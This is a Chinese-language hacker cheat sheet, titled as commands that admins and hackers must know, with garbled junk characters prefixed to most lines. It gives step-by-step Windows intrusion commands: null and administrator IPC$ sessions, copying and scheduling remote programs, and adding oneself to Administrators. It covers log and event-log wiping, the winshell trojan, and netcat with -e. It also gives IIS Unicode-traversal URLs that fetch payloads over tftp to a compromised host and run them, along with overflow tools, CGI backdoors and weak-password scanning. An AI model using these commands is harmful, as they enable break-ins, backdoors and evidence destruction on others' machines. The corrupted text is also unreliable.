网管和黑客都必须知道的命令
KtcuGI��/A 常用的几条NET命令:
�gTk*v0WBm v�,jB(B^|Z (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�Ao, <G.>R #F#M<d3-2
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
i�>�
�dLp� �3/Dis)
v8 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
Kv�umU>c#A N=��j$~,yG (查看远程主机时间) net time \\IP地址
o('�6�,D� ��H`nd |�� (定时启动某个程序) at \\IP地址 02:18 readme.exe
�*�})Np0�k >"�[Nmx0;w (查看共享) net view \\IP地址
���d��Z �x � ->��'xjD (查看netbios工作组列表) nbtstat -A IP地址
BeFXC5-qat \�t]_UNGyW (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
x$) E^�|A+ tja�7y"(] (这两条把自己增加到管理员组): net user 用户名 密码 /add
dMK\ y�4#i 1IN^,A]r2h net localgroup Administrators 用户名 /add
)CD-cz�6n N��~%~�Q�� (断开连接) net use \\IP地址\ipc$ /delete
^L�-;� S�� �~iJ@�x;�` 扫尾:
�#:=�*n(GT V�gO.i�n^q del C:\winnt\system32\logfiles\*.*
��#]J"j]L� s1J��(��-O del C:\winnt\ssytem32\config\*.evt
I^m�9(L4%� I\��f\k>;� del C:\winnt\system32\dtclog\*.*
|N0�RB�a4% {2LG$x�-N% del C:\winnt\system32\*.log
[b�jP-�p�X aPin6�L$;) del C:\winnt\system32\*.txt
�MP�M��AFs J+=�?t�aZ� del C:\winnt\*.txt
K1t>��5zm� �}tbZ[:T{K del C:\winnt\*.log
6|Xm8,]yRw .q'�{���3� 一、netsvc.exe
�O�E2r�2ad ��pE��6r7� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
@�;�Xa&*�� cG!�d�Mab( netsvc /list \\IP地址
�B<jVo�%og R) �J/z��� netsvc schedule \\IP地址 /query
Xz"xp8Hc(6 ;O {"\�H�6 netsvc \\IP地址 schedule /start
�Nu�aq�{cl V8�2hk�0*j 二、OpenTelnet.exe
(�/C
8\}Ox �AQ)��J�|i 远程启动主机的Telnet服务,并绑定端口到7878,例如:
� ��k����< lI�;�A�CF^ OpenTelnet \\IP地址 用户名 密码 1 7878
Tua#~.�3}J W�_[ tdqey 然后就可以telnet到主机的7878端口,进入DOS方式下:
qco�Tt~��\ ;r��C< C�� telnet IP地址 7878
j�#�����
n i}v�3MO\�X 三、winshell.exe
U�b`vf4EB w~>t��pkUB 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�c"pu"t@/Z %18%T{|�$e p Path (查看winshell主程序的路径信息)
Z<`:xF�y�( c�Q�q7�8Lo b reBoot (重新启动机器)
._6�e#��=
�7%5�EBH & d shutDown (关闭机器)
9lB$i2G>Zw ;]�_h")4"c s Shell (执行后你就会看到可爱的“C:\>”)
Zn�6u6<O=� �'�6GW�.�; x eXit (退出本次登录会话,此命令并不终止winshell的运行)
c:2LG_�m�Q �[#;CBs5�o CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
{`V ^V�_�� ��O��|*-�J 四、3389登陆器,GUI方式登录远程主机的
t>�eeOWk�3 WU~L#Ih.V� 五、elsave.exe
uYXkD#��{� N]&:��xd5� 事件日志清除工具
`{xKU�8j�^ "f�>`�ZFp^ elsave -s \\IP地址 -l "application" -C
N���ZZc[P [�I=�1��
� elsave -s \\IP地址 -l "system" -C
�F_~�A8��y 1B~[L 5p9� elsave -s \\IP地址 -l "security" -C
uE�r��['�> [BFPIVD)h] 执行后成功清除应用程序日志,系统日志,安全日志
Uwg*�kJ3H _�c,{�}s�n 六、hbulot.exe
w�pcqg��c� �c1�����Hp 开启win2kserver和winxp的3389服务
2!GyQ@�&[W
|��A#�\5u hbulot [/r]
�Y�m
1; /' �z|O3p�Qn~ 使用/r表示安装完成后自动重起目标使设置生效。
j�{S�bf0�4 F-GH�?sfvi 七、nc.exe(netcat.exe)
[m(�n-Mu�F 6@�I��r|o 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
B4x@{r�tER Wx�|De7��* 想要连接到某处: nc [-options] hostname port[s] [ports] ...
uVa`2]NV r J��6Nhpzp 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
&[_D'jm+S0 �!H~PF*,hY 参数:
f*Yr*�yC� hZ-?-F?�*@ -e prog 程序重定向,一旦连接,就执行 [危险!!]
�sU"sd7�#A �UL�`%�Xx -g gateway source-routing hop point[s], up to 8
l{hO�"fz�y ISg-?h�/�� -G num source-routing pointer: 4, 8, 12, ...
E�C�7)M�}H �kn}bb�*eZ -h 帮助信息
f �s�2}��a V�UzRA"DP| -i secs 延时的间隔
\2���M{R �G x{�G}9� -l 监听模式,用于入站连接
/]9�(InM9/ ?�s[!J�eUA -n 指定数字的IP地址,不能用hostname
rb�I 7�
3' (����B��Ig -o file 记录16进制的传输
-?vVV@W-O^ w�Ly:S�.r -p port 本地端口号
$��~NB
.SY r;GA�QH}j_ -r 任意指定本地及远程端口
�S>�y}|�MG iO�7s �z�i -s addr 本地源地址
lCGEd� � 3 _Q7]Dw�/w\ -u UDP模式
��E��Xt�i ;�:'A��Bfs -v 详细输出——用两个-v可得到更详细的内容
G�'���mg-{ �@�s�|yH�" -w secs timeout的时间
A�U<A�\� � yv\�
j�&B| -z 将输入输出关掉——用于扫描时
Xr�{�
r&Rl 八、TFTPD32.EXE
Yduj3H�t:w �d�)L,kz�N 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
��r�s,:pU� >Zh^�,T={G http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
i�&0��Zli .�Z�r3!N.t 然后可以直接令文件运行:
Te�d!*HKlB "=�yz�}�~, http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
#2�;8�/�"v &���90�pKs 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
E=t^I/f)E Js�D��T��
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
��]*<!|;�q ! l"�*D��R 一、一 Xscan命令行运行参数说明:
76�b�2 3�| ()z�n8�_z� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
duoM�>B>8] !r4�B1f�X 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
P�a�"[&{�: -gp��H��g� xscan -file <主机列表文件名> <检测项目> [其他选项]
M\r=i>(�cu <=@6UPsn2� 其中<检测项目> 含义如下:
Xw�&vi\*�m QsyM[;�\j: -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�$>�h��H�{ ORFi0gFb�A -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
mX� G��W+� :��b����<< -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
0iV�eM!bM }�[]�1`2qD -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
U�,T�h-�oU sn8r`5�9C -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
2�tZ\/6G�< g&X
X@I8+v [其他选项] 含义如下:
�=m
U</�F) �)5w#���n1 -v: 显示详细扫描进度
kcE86Y=|x! .�B{:<;s�a -p: 跳过Ping不通的主机
f9^ML��b6) �ET\rd5�Po -o: 跳过没有检测到开放端口的主机
jV(b?r)eT{ RM#.-gW� � -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
